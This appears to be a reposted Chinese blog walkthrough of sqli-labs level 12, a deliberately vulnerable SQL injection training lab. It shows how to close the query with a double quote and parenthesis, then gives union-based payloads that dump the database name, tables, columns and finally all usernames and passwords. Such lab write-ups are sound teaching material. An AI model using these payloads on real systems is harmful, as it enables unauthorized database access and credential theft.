sqli-labs(12) - 走看看

zoukankan html css js c++ java

sqli-labs(12)
0X01摘要体现（小编这里傻逼了可以直接用group_concat函数绕过显示问题我还在用limit绕过）

还是这个模块我们很熟徐那么先来尝试一下

单引号加入

无报错信息哦豁加入双引号试试呐

哦豁好像报错了还多了一个括号那我们尝试一下闭合语句
") order by 1 #
好像成功闭合了哈哈看来没有猜错元语句应该是 id=("")

那都知道了语句的闭合原理那我们开始我们的注入旅途吧 OK let’s go

0X02爱之初体验爆数据库
") union select null,database()#
0X03就是一套组合拳了爆破表名
") union select null,table_name from information_schema.tables where table_schema='security'#
老规矩他只显示了一个数据我们可以用limit函数来一个一个拆解出来嘿嘿
") union select null,table_name from information_schema.tables where table_schema='security'limit 1,1#
0X04继续我们的组合拳爆破列名
")union select null,column_name from information_schema.columns where table_name='users' limit 0,1#
0X05组合拳打到底爆破字段名
") union select null,group_concat(username,0x3a,password) from users#
舒舒服服

完结

切记慢就是快
查看全文

相关阅读:
SimpleXML简单使用
 制作RSS供应源
 DOM方式操作XML
Referer与图片防盗链
 PAT
Margarite and the best present
Petya and Origami
Margarite and the best present
Petya and Origami
A/B

原文地址：https://www.cnblogs.com/-zhong/p/10916063.html

Copyright © 2011-2022 走看看